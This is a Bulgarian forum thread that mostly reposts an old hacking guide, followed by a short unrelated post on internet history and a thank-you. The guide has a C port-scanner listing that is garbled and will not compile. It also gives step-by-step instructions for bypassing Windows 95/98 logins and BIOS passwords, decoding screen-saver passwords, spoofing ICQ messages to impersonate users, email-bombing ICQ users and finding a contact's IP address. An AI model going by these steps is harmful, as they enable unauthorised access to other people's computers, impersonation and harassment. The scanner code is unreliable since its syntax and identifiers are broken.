/* !!! Не съм я изпробвал !!! */
/* -* C -*- tcpprobe.c */
#include <STDIOL.H>
#incliude <SYS/SOCKET.H>
#include <NETINET/IN.H>
#include <ERRNO.H>
#include <NETDB.H>
#include <SIGNAL.H>
int main(argc, argv, envp)
int argc;
char **argv;
char *envp;
{
int proberport = 0;
struct bostent *host;
int err, i, net;
struct sockaddr_in sa;
if ( argc != 2 ) {
printf ( "Ussage: % hostname\n", argv[0] );
exit (1);
} /* if */
for ( i = 1; i < 1024 ; i++) {
strcpy ( (char*) &sa, "", sizeof sa );
sa.sin_family = AF_NET;
if ( isdigit (*argv [1) ) {
sa.sin_adre.s_addr = inet_addr ( argv[1] );
} else
if ( (host = gethostbuname (argv [1])) != 0
strncpy ( (char* ) &&sa.sin_addr, (char*) host -> h_addr, sizeof sa.sin_adr );
else {
herror ( arggv [1] );
exit (2);
}
sa.sin_family = AF_INET;
if ( isdigit ((*argv [1]) ) {
sa.sin_addr.s_addr = inet_addr ( argv [1] );
} else
if ( host = gethostbyname (argv [1]) != 0 ) {
strncpy ( (char*) &sa.sin_addr, ( char*) host -> host -> h_addr, sizeof sa.sin_addr );
} else {
herror ( argvb [1] );
exit (2);
}
err = connect ( net, (struct sockaddr* ) *sa, sizeof sa );;
if ( err < 0 ) ) {
printf "%s %-5d %s \r", argv [1], i, strerror (errno) );
fflush ( stdout );
} else {
printf ( "%s %-5d accepted \r", argv [1], i );
if ( shutdown (net, 2 ) < 0 ) {
perror ( "\nshutdown" );
exit (2);
}
}
close ( net );
}
} /* NEXT */
printf (" ", fflush ( stdout );
return 0;
} /* main */


Глава 3
Проникване в Window 95/98
Лесно проникване 1
Стъпка 1: Включвате компютъра.
Стъпка 2: Когато се появи на екрана системната конфигурация натиснете F5. Ако системата не показва такъв екран просто си натискайте този клавиш.
При условие, че всичко в системата е наред ще видите няколко опции, тя зарежда Widows в Safe режим - екрана ще изглежда малко странно, но няма да ви се иска парола и ще имате достъп на всякъде.

Лесно проникване 2
Стъпка 1: Включете компютъра.
Стъпка 2: Натискайте F8 и когато се появи Mircosoft Windows 95 Startup Menu, заредете MS-DOS.
Стъпка 3: Напишете RENAME C:\WINDOWS\*.PWL *.ZZZ
Стъпка 4: Рестартирайте системата. На екрана ще се появи диалог. Въвеждате нова парола и всичко е ОК.

Ако F5 и F8 са изключени
Нека допуснем, че имаме Window 95/98 система, която при зареждане не реагира на F5 и F8. Не се мислете, че не е възможно да се проникне в нея. Все пак не би било лошо ако искате поне малко сигурност да изключите възможността за използване на тези клавиши и след това от BIOS да изключите възможност за зареждане от флопи. Но информацията ви пак няма да бъде сигурна.

Как да се конфигурира начина на зареждане na Windows
Информацията е записана в msdos.sys. Този файл се намира в главната директория. Тъй като файла е скрит, най-лесния начин да го намерите е да кликнете на My Computer, след това с левият бутон иконата на устройството, от което зареждате, избирате Explore и намирате msdos.sys. Тъй като файлът е скрит, трябва да изберете properties и да махнете read only and hiden атрибутите. С noterpad отваряте файла, който изглежда така:
[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootCU=1
Network=1
The follownd lines are required for compatibility with other programs
;Do not remove them (MSDOS.SYS needs to be > 1024 bytes
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxx
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxx
За да изключите клавишната комбинация трябва да добавите в [Options] следния ред:
BootKeys=0
BootDelay=0

Втория начин
Ами добрия стар DOS явно скоро няма да бъде забравен. Зареждате от дискета, командата ATTRIB махат се атрибутите и после с текстов редактор се добавят горепосочените редове.
За съжаление този метод ще позволи и проникването в системата с изключени контролни клавиши по време на зареждане.
Това която ви остава да направите е от BIOS да забраните първоначалното зареждане от флопи. Това ще затрудни повечето любители но не си мислете, файловете ви са на сигурно място на твърдия ви диск.

Как се пробива парола в BIOS
В BIOS има два типа зашита - първият иска парола за промяна на променливите в самия BIOS, а втория изисква парола за стартирането на самия компютър.
В зависимост от типа на защитата има два варианта на действие
1. Ако има парола за достъп до BIOS в Internet има твърде много програми, с чиято помощ може да бъде прочетена паролата от BIOS.
2. Когато дори не може да бъде стартирана програма, тогава лицата, които искат да се сдобият с достъп, просто махат батерията, захранваща паметта, в която са записани променливите на BIOS-a.
След като сте прочели всичко това логично е да се запитате - съществува ли в Widows 95/98 система на сигурност, на която потребителя да се довери? Отговорът е НЕ.
В действителност, когато някой разполага с физическо достъп до даден компютър единствения начин да го защити е използването на крипотографски софтуер, реализиращ алгоритъм с достатъчно висока сложност.
Тук не разгледахме един начин за отдалечено проникване в Windows система, но и за това съществуват повече от достатъчно начини. Освен това повечето Windows 95/98 клиент системи се свързват към Internet през прокси или по dial-up връзка, така че проникването е в изместен смисъл затруднено. Но не и невъзможно.

Windows screen saver

програма компрометира сигурността
Защо трябва внимателно да избираме пароли:
Да започнем от една съвсем банална парола - тази на screen saver програма на Windows. Тя направо е излишна - всеки съвсем лесно може да рестартира компютъра ви и да я заобиколи. Още по-лошо е ако реши просто да я прочете от там където е записана.
В Win 3.1 паролата се съхранява в CONTROL.INI. При 95 тя е във файла \WINDOWS\USER.DAT. За другите потребители на системата трябва да се провери \PROFILES\USERNAME. Както сигурно мнозина от вас ще се досетят USER.DAT е един от двата файла, в който се съхранява registry информацията и затова той е изключително важен. Така, че хубаво е да имате негово копие преди да го пипате.
След като отворите този файл ще видите дали screen saver програмата има парола или не. Това дори е достатъчно за изключването на паролата. Тя е елементарно кодирана и записана. Максималната дължина е 14 символа. Windows позволява въвеждането на по-дълги пароли, но просто не се интересува от това.
След ScreenSaver_Data следва кодирани символи - те са паролата. За съжаление за изключително малко време може да бъде разбрана и самата парола. Опитайте сами и ще се убедите, че е така.
Какво от това?
Повечето потребители са глупави или просто мързеливи, имат лоша памет или произволна комбинация от всичко това. Как да ги накараш да използват различни пароли.
Със съвсем малко усилия всеки може да се сдобие с парола, която да му отвори достъп до мрежови ресурси, кодирани данни и т.н.
Помислете добре преди да започнете да използвате една парола навсякъде.
Най-добре не си слагайте парола на screen saver програмата - данните ви ще бъдат по-сигурни.

Полезни псевдо-хакерски трикове за Windows
Как да променим името, на което е регистриран Windows 95/98?
Ако компютъра ви е доставен с предварително инсталиран Widnwos, най-вероятно той е регистриран на потребителя като "OEMUser" или друга подобна глупост. Какво може да се направи?
Да се променят две променливи, записания Registry на Windows.
Какво е първото нещо, което трябва да се направи?
Копие на registry. Съвсем сериозно е.
След това в HKEY_LOCAL_MACHINE, избирате Software/Microsoft/Windows/CurrentVersion.
Кликвате на RegisteredOrganization и на REgisteredOwner и въвеждате вашите данни. Просто нали?
Не забравяйте да рестартирате Windows, защото преди това няма да забележите промените.
Ако нещо объркате и промените други променливи, не се притеснявайте просто заредете копието.
/* Правило: Винаги преди да направите промени в Registry на Windows операционната система (без значение, която от всичките) направете КОПИЕ!. Това няма да отнеме време но ще ви спаси от преинсталация. */

Глава 4
Няколко думи за вирусите и останалите неща наричани така
Троянски кон:
Програма, скрита в друга програма, която твърди че прави нещо а в същност върши друго. Някой от троянските коне са особено "злобни" - може да форматират диска.
/* Препоръка: Не стартирайте файлове, които не е ясно от къде са се появили */
Вирус:
Вирусите са самостоятелно функциониращи програми със собствена логика, които се размножават т.е. правят копия на самите себе си .Те може да са прикрепени към друга програма, документ на приложение със собствен скрипт език (някое от Office приложенията например) или да са записани в свободна системна област. Вирусите може да променят или унищожават данни, да намаляват производителността на системата ви, използвайки ресурсите и. Няма универсално решение срещу тях.
/* Предупреждение: Безразборният секс крие опасности. Безразборното копиране (от Internet или другаде) и стартиране/отваряне на програми/документи също. */
Червей:
Това са програми, които правя копия на самите себе си, от система на система. Това са самостоятелни програми, които използват мрежите по същия начин, по който вирусите файлове, за да се разпространяват.
Някой експерти казват, че най-сигурния начин да се предпазим от вируси и червей е да нямате мрежа и файлове. Към това може да добавим, че още по-сигурно би било ако нямате компютър; -)
Логическа бомба:
Програмен код, който ще се активира при определено условие и ще извърши определена атака на системата, в която. Не малко вируси съдържат в себе си логическа бомба.

Глава 5
ICQ - най-несигурната Internet програма?
ISQ печели все по-широка популярност, но ако има приложение /услуга, в което на сигурността явно не се обръща почти никакво внимание това е то. Интересно е, че в Mirabilis продължават да не взимат мерки.
За да се убедите сами може да проверете следния експеримент:
1. Инсталирайте ICQ на два отделни компютъра. Регистрирайте двама потребители.
2. Намерете си ICQ Message Spoofer. Не Flooder, освен ако той не може да се скрива зад фалшиво UIN. Копирайте UIN на единия от двамата потребители и му изпратете съобщение с неговия си номер.
3. След това добавете потребителя към неговия си Contact List. Представете си колко лесно може някой, който не е наясно какво става да бъде убеден, чрез текста на това съобщение.
4. Вече сте близо. Сега затворете ICQ на компютъра жертва (за съжаление Internet също има начини, които да симулират, че ICQ е било затворено nike. DoS атаки и т.н.)
5. На другия компютър, на които ICQ продължава да работи, отидете в Menu, add /change current user и добавете друг регистриран потребител (Add another Registered user). Вече има нов UIN на разположение.

Бомбардиране в ICQ
Това също е възможно. Уви! ICQ разполага с EmailExpress. Всичко което ви трябва е UIN и добра програма за e-mail бомбардировка. Когато тя бъде конфигурирана така:
ICQNUMBER@PAGER.MIRABILIS.COM
Например:
12345@PAGER.MIRABILIS.COM
Лицето с UIN ще бъде бомбардирано, докато не спрете програмата.
Как да се предпазим от подобни неща?
Отидете в Security and Privacy и конфигурирайте ICQ да не приема EmailExpress Messages.
Ето и една програма, чиито код ще е интересно да бъде разгледан. Mirablis знаят и за този проблем но не правят каквото и да е:
/* ICQ File Spooler
* To compile g++ icqfile.cpp -o icqfile
*
* Known bugs:
* - Doesn't support speed changes
* - Doesn't work quite right with the Java client
*
* Tested with:
* - Slackwaer Linux 2.0.30
* - ICQ Version 98a beta, DLL v1.07
page - 57 - for write
*/

Откриване на IP адрес на ICQ системи
Ако не вярвате опитайте следното:
1. Свържете се с потребител - без значение по точно кой начин - важното е да има връзка между двете системи.
2. В DOS напишете следното
netstat -n
Ще видите нещо подобно:
Active Connection
ProtocolLocal Address Foreign Address State
TCP 203.21.2.181.:1067 209.108.151.76:80
CLOSE_WAIT
TCP 203.21.2.181.:1069 209.108.151.76:80
CLOSE_WAIT
TCP 203.21.2.181.:1070 209.108.151.76:80
CLOSE_WAIT
TCP 203.21.2.181.:1074 209.108.151.76:80
CLOSE_WAIT
TCP 203.21.2.181.:1084 209.108.151.76:1054
ESTABLISHED
203.76.151.67 е чуждото IP, което може да бъде използвано за различни (все лоши) неща.

Има ли спасение?
Най-интересното е че да. Поне до известна степен.
Стъпка 1: Изберете ICQ Buton.
Стъпка 2: Изберете Preferences.
Стъпка 3: Изберете Connection.
Стъпка 4: Изберете "I am using a permanent internet connaction:"
(LAN)
Стъпка 5: Изберете "I am behing a firewall".
Стъпка 6: Изберете Кликнете върху settings бутона
Стъпка 7: Изберете "I ama using a socks4 proxy".
Стъпка 8: Натиснете next бутона
Стъпка 9: Въведете фалшив IP адрес в "SOCK4 Host:"
Стъпка 10: Довършете започнатото натискайки next и done бутони.
Забележка: Потребителите ще получават съобщението "Cannot establish a direct connection", което се дължи на факта, че ICQ се опитва да се свърже с фалшив адрес.
Какво ли ще стане ако въведете IP на друг потребител и той се опита да се свърже с вас?
Може би ще се свърже със себе си...

Глава 6
IRC
Какво е IRC
IRC означава Internet Realy Chat. Използвайки IRC хората по цял свят може да разменят съобщения в реално време. Всеки отделен потребител използва своя IRC програма (известна като клиент). Клиентът се свързва към по-голям компютър (наричан сървър), към който са свързани други клиенти и/или други сървъри. Няколко свързани сървъра образуват така наречените IRC мрежи.
Всички IRC клиенти имат общи основни функции и позволяват на обмена на информация в реално време, независимо от местоположението на потребителя. Единствено е необходимо той да има връзка към Internet.
Никове (nick/nickname
Всеки потребител се свърза към сървъра със свой ник, чрез който се идентифицира пред останалите потребители. Може да има само един потребител с даден ник в рамките на IRC мрежата, така че сървърът няма да позволи връзка ако някой друг вече е използвал даден ник.
Тъй като в големите IRC мрежи винаги има няколко хиляди души, често използваните никове обикновено са заети. Може да ви изглежда странно, но по някога е много трудно да се намери нов оригинален ник. Хитрото използване на небуквени символи често помага.
Какво е канал?
Всеки канал има свое собствено уникално име, което винаги започва със символа #. Възможно е да има локални канали, започващи с &, но те се използват много рядко.
На каналите може да се гледа като на виртуални стаи, в която "виждате" и "чувате" всичко, което става. Така в една IRC мрежа може да има стотици и дори хиляди канала, в която различни хора обсъждат различни теми.
Влизането присъединяването към канала става с командата
JOIN #име_на_канал
Някой IRC клиенти с графичен интерфейс разполагат с бутони и менюта за тази и други команди, но дори при тях писането на командите от клавиатурата понякога е по-бързо.
Всички команди започват с "/".
Когато след командата въведете име на канал, което не съществува, ще създадете свой собствен канал. Разбира се първоначално ще сте сами в него, но винаги е възможно някой да влезе в него, а вие може да го поканите с команда:
/INVITE
Оператор на канал (ОП)
Първият, който се свърже в даден канала става автоматично оператор на канал. Той може да променя параметрите на канала - например да го направи скрит или да направи само поканените да влизат в канала.
В един канал може да има повече от един (ОП). Един ОП може да даде ОП привилегии и на друг потребител. Оповете може да кикват потребители в даден канал и да забраняват достъпа им в бъдеще (ban). Може да познаете оповете по символа @ пред ника им.
Частни съобщения
В един канал всеки вижда това, което казват другите, но има и възможност за изпращането на частни съобщения:
/MSG NICKNAME съобщение
Потребителя, на който изпращате съобщение го вижда, но другите не го виждат. В някой IRC клиенти има отделен прозорец за частни съобщения.
Заплахи за сигурността
IRC не е едно от най-сигурните места, тъй като информацията, която се обменя не е кодирана. Но освен ако не става въпрос за нещо наистина секретно можете да бъдете спокоен, че никой няма да ви следи.
Все пак не предоставяйте лична информация в IRC. По добре ще е за вас.
Разбира се в IRC лесно може да привлечете нежелано внимание. Лесно може да бъде видяно вашето IP и някой да се опита да ви прави мръсни номера. Такива има не-малко.
Защо не може да се свържете с някой сървъри?
Не малко IRC сървъри дават достъп само на определени потребители и изискват парола. Други са конфигурирани само за достъп от страната, в която са.
Въпреки това има достатъчно сървъри, които са отворени за всички, но някой системи са по-бавни поради многото хора в тях. Това причинява известни неудобства и увеличава времето, необходимо за обмен на информацията. Това се нарича лаг (lag влача се)
Какво е лаг?
Лаг е термин за описание на ефект то забавянето, което се наблюдава между два сървъра. Например ако някои в България каже, Hi, съобщението се предава към сървърите в мрежата, които се грижат да го получат всички потребители в канала. Това отнема доста време, което в някой случаи достига минути. След това ако ваш приятел в САЩ ви отговаря е необходимо време, за да достигне съобщението до вас в такъв случай е да опитате да смените сървърите. Забавянето може да бъде лесно проверено с командата
/PING NICKNAME
За да определите за колко време стига едно съобщение до някой потребител. IRC клиентите отговарят автоматично на PING обръщения.

Глава 7
Скриптове в mIRC
Скриптовете са много полезно нещо. Със скрипт може да се автоматизира дадена задача или да разширите възможностите на своя IRC клиент. Тук като mIRC е най-често използвания клиент от подобен род, тук ще се спрем на неговите възможности в тази насока.

Ботове
Бот може да се разглежда като кратка форма на робот, но mIRC бота представлява скрипт, които е така написан, че да реагира на команди и събития. Ботовете се използват в някои канали, за да им бъде придаден колорит с някой от по-специални действия и функции, изпълнявани от тях.
Има различни видове ботове: бойни ботове, бар ботов и канал ботове. На бойните ботове няма да бъде отделено внимание по ред причини, но ако имате толкова голямо желание да си направите боен бот, прочетете какво пише пише тук и действайте. Интересно защо, но мнозина мислят, че бойните ботове са най-интересни, а това определено не е така.
Има бар ботове, които сервират напитки и храни, играят игри и т.н. Те може да се използват много успешно за придаване на колорит на развлекателни канали.
Зареждането
За да заредите бод трябва да стартирате второ копие на mIRC с параметър основното .ini на бота.
/* Внимание! Не стартирайте ботове на сървъри, където тяхното използване е забранено */

От къде идват ботовете
Хората с достатъчно опит и усет към програмирането създават ботове, които се разпространяват (в по-голямата си част) безплатно по Internet.
В Web ще намерите достатъчно, а освен това има и специални канали посветени на тях.
Не бъркайте IRCii скриптовете или С ботовете с тези на mIRC. IRCii е коренно различен клиент софтуер, създаден за Unix платформа.
Разширения на mIRC
Има не малко разширение за mIRC, които е хубаво да се използват. Всички посочени по-доло разширения използват DDE функции на mIRC. Те са: mIRC iF, IRCWav, and Torxdcc
mIRCiF
Това е програма, което е предназначена за mIRC. Тя може да бъде използвана във всяка версия на програмата след 3.92 (включена поддръжка на DDE).
Това решение позволява използването на IF-THEN-ELSE оператор. Тази възможност превръща mIRC в особено мощен клиент, тъй като с този оператор може да се правят редица неща.
Синтаксис за mIRC iF:
/dde if mirc "" argument_1 argument_2 {команда, която да се изпълни при резултат TRUE}[команда която да се изпълни при резултат FALSE] Аргументите, над който се извършва логическо сравнение може да са от следните типове:
Вътрешна променлива на mIRC
Например: $nick, $channel, $params и т.н.
Дефинирана от потребителя променлива на mIRC.
Например %nick, %channel, %number и т.н.
Може да се извършват следните сравнения:
== Argument_1 равен ли е на Argument_2
>= Аргумент_1 по-голям ли е или равен на Аргумент_2
<= Аргумент_1 по-малък ли е или равен на Аргумент_2
<< Аргумент_1 по-малък ли е от Аргумент_2
>> Аргумент_1 по-голям ли е от Аргумент_2
!= Аргумент_1 различен ли е от Аргумент_2
За подробности може да проверите help файла на самата програма.
Трябва да направите някой неща преди за използват mIRC iF.
В mIRC трябва да зададете 200 или по-висока стойност на DDE Delay.
IRCWav
IRCWav е програма, разширяваща звуковите възможност на mIRC и имаща за цел да улесни работата с тях.
IRCWav ще изведе списък от WAV файлове от директорията, която сте оказали и след това може да изберете на кого да изпълните този WAV. IRCWav има лесна за използване функция за изпращането му.
TorXDCC
TorXDDC е програма, която улеснява предлагането на файлове в IRF чрез пакети и списъци. Програмата е подобна на mIRC Offer.
TorXDCC може да създаде отделни списъци, като във всеки то тях да има различни файлове. Тези списъци може да бъдат извикани чрез съобщения.
Има много интересни неща, които може да правия с mIRC Remote.
Файл сървър
За да установите файл сървър трябва да добавите следното в commands:
l:SERVER: /FSERVE $nick 3 c:\files\ c:\fiiles\welcome.txt
Така при обръщение от страна на друг потребител пред него ще се отваря файл сървър. В примера всеки има достъп до c:\files и всичките поддиректории.
В welcome.txt запишете съобщението, което да се извежда на екрана на потребителя, който се свързва с вас. 3 означава, че са позволени 3 връзки. Има 7 команди, коти може да се използват във файл сървъра:
CD; DIR; LS = DIR; GET - DCC име на файл; READ - прочита текстов файл; HELP - показва командите; EXIT/BUE - изход.
Малко справочна информация:
$! - вмъква информацията от $
$$N - извиква параметър за довършване на команда
$+ - добавя текст директно от друг текст adds
$? - отваря прозорец, така че може да се въведе информация
$addate - датата в САЩ
$cb - съдържанието на клипборда
$date - дата
$day - ден
$dir - извежда пълен диалог за директория и файлов диалог
$file - бърз файлов диалог
$filldate - час/дата/ден
$host - host
$ip - ip addres
$me - собствен ник
$nick - ник на изпращащия команда
$newnick - нов ник
$opnick - ник на оп-нат потребител
$parm - всички параметри
$pnick - ник, от който се /play файл
$r - случаен идентификатор
$read - чете от файла
$server - текущ сървър
$site - сървъра на друг потребител
$snick - списък от никове
$time - текущо време
$url - текущо URL, разглеждано в браузър.
ON ACTION - при действие
Пример: +1:ON CHAT :*howdy*:/msg = $mirc:/me мисля
$nick трябва да внимава
ON CHAT - при сабите в dcc чат
Пример: 1: ON CHAT: *howdy* :/msg = $nick Здрасти,
$nick $ + !!!
ON INVITE - при покана
Пример: 1: ON INVITE: notice $nick Не, благодаря....
ON JOIN - при включване
Пример: 1: ON JOIN #mirc:/notice $nick Добре дошъл
$chan
ON KICK - при кик
Пример: 15!: ON KICK #mirc:/notice $me liked $nick better than $newnick
ON NICK - при промяна на ник
Пример: 1: ON NICK :/notice $nick $me liked $nick better than $newnick
ON NOTICE - при /notice
Пример: 1: ON NOTICE :/msg $nick На мен ли говориш?
ON NOTIFY - при включване на някой, който е notify списъка
Пример: 1: ON NOTIFY :/msg $nick Здрасти! Къде се губиш?
ON OP - когато някой е оп-нат
Пример: 15!: ON OP:#mirc:/onotice #mirc Харесва ми
$opnick да е оп!
ON DEOP - при де-оп
Пример: 15!:ON DEOP:#mirc:/onotice #mirc Сигурен ли си за $nick $+ ???
ON PART - при напускане на канала
Пример: 1:ON PART:#mirc#/msg $nick Чао!
ON QUIT - при напускане на IRC
Пример: 1: ON QUIT:/ echo 4 $nick напусна IRC
ON SERV се изпълнява когато някой напише нещо във файл сърврър
Пример: 1: ON TEXT :cdup:/msg = $nick Използвай cd .. а не cdup
ON SERVERMODE - възниква когато mode е от сървър
Пример: 1!:ON SERVERMODE +pilsk:#nick:/mode $chan -pilsk
ON SERVEROP - когато сървъра дава оп
Пример: 1!:ON SERVEROP:#mirc:/mode $chan -o $opnick
ON SNOTICE - когато сървър notice
Пример: 1: ON SNOTICE: *clinet connecting*:!
ON TEXT - когато някой каже даден текст
Пример: 15!:ON TEXT :!opme:#mirc:/mode $chan +o $nick
ON TOPIC - при смяна на темата
Пример: +1!:ON TOPIC:#mirc:/notice $nick хей не пипай топика!
Някой от примерите са доста глупави, но ако ги разберете ще ви свършат работа и ще ви помогнат да разберете следващите разширения за mIRC, който могат да ви свършат работа или дори да ги разширите за собствени нужди.

Автоматичен away
Със следните два алиса може автоматично да премине в away режим след определен период от време. Може да включите /autoaway On В Perfotrm ако искате да се включва в началото на всяка IRC сесия.
Синтаксис: /autoaway [ON/OFF] <време в минути>.
checkidle
if ( $away == $true ) goto end
if ( $idle >= %autosecs ) {
Echo 4 -a AutoAway Set after %automins minute(s) Idle time
Away Autoaway After %automins minute(s) Idle time
}
:end
}
autoaway {
if ( $1 == $null ) {
echo 4 -a Autoaway is currently": %autoaway
echo 4 -a Autoaway after %automins minute(s) Idle
}
elseif ( $1

Tedi4ka
02-15-2009, 01:14
История на интернет

Преди повече от 20години Интернет беше съэдаден эа да осигори на университетите, правителствените агенции и други изследователски институции в САЩ начин да обменят файлове и информация. В началото Интернет свързваше само няколко мрежи. Това беше лесно той да се утъждествява с кабелите, който свързваха всяка от мрежите. С течение на времето и други университети пожелаха да свържат своите мрежи към Интернет, за да могат и те да поделят ресурси и да комуникират с други потребители в Мрежата. За да свържат своите мрежи към Интернет, университетите просто заплащаха за инсталиране на кабелите, необходими за свързване към някоя друга мрежа, която вече е свързана към Интернет.С течение на времето, когато учрежденията започнаха да свързват своите мрежи към Интернет, той започна да се разраства.В зависимост от местоположението и нуждите на учреждението, то може да използва оптичен кабел, сателитна връзка или дори по-евтината телефонна връзка.Най-важното обаче беше, че Интернет се разрастваше самостоятелно, без да бъде собственост на конкретна компания или държава.

Интернет е мрежа от компютърни мрежи

Интернет свързва компютърни мрежи по целия свят. По интернет потребителите поделят файлове и устройства, а също така комуникират с помоща на различни програми една от които е електронната поща.Ежедневно стотици милиони потребители се свързват към Интернет ( Който често наричат Мрежата) и сайтове или да се одадат на различни дейности като онлайн пазаруване и обменяне на чат съобщения с други потребители. Терминът Интернет е съкращение от Интернетуърк, което означава “работа в мрежата” или “взаимодействие между мрежи”интернет е просто мрежа от компютърни мрежиVтъй като интернет свързва мрежитеы потребителите от една мрежа могат да поделят ресурси например файлове или принтери с потребители от друга мрежаV по подобен начин потребителите могат да изпращат и да получават е-маил съобщения по Интернет.

Как се използва Интернет от потребителите?

Потребителите използват активно Интернет, за да изпращат и получават електронни съобщения и да преглеждат сайтове в търсене на определена информация. Освен това потребителите използват Интернет и за да се обменят чат съобщения с други потребители, да обменят файлове, да разговарят с други потребители посредством микрофона и компютърните колонки, да участват в интерактивни игри с един и повече потребители, дори и да участват във видео конференция, която се провежда по Интернет.С помоща на вашия компютър и модем можете да използвате повечето от тези услуги в Интернет.

Свързване на мрежата към Интернет

Свързването към Интернет от вашия компютър става с помоща на доставчици на Интернет услуги, които предоставят на домашните потребители начин да се свържат към Мрежата. Доставчикът на Интернет услуги е компания, която свързва своята мрежа към Интернет. След това срещу месечна такса потребителите могат да получат достъп до Интернет, като се включат в мрежата на доставчика,на Интернет доставчика посредством своите модеми. След като даден потребител свърже своя компютър към доставчика на Интернет услуги или към онлайн услуга, той може да изпраща и получава електронна поща по Интернет, да преглежда сайтове и да използва най-различни програми, за да обменят чат съобщения, да разговаря или да изпраща факсове до други потребители.Потребителят заплаща на доставчика на Интернет услуги месечна или почасова такса за свързване към Интернет.

bebygirl
02-15-2009, 08:31
mersiiiiiiiiiiiiii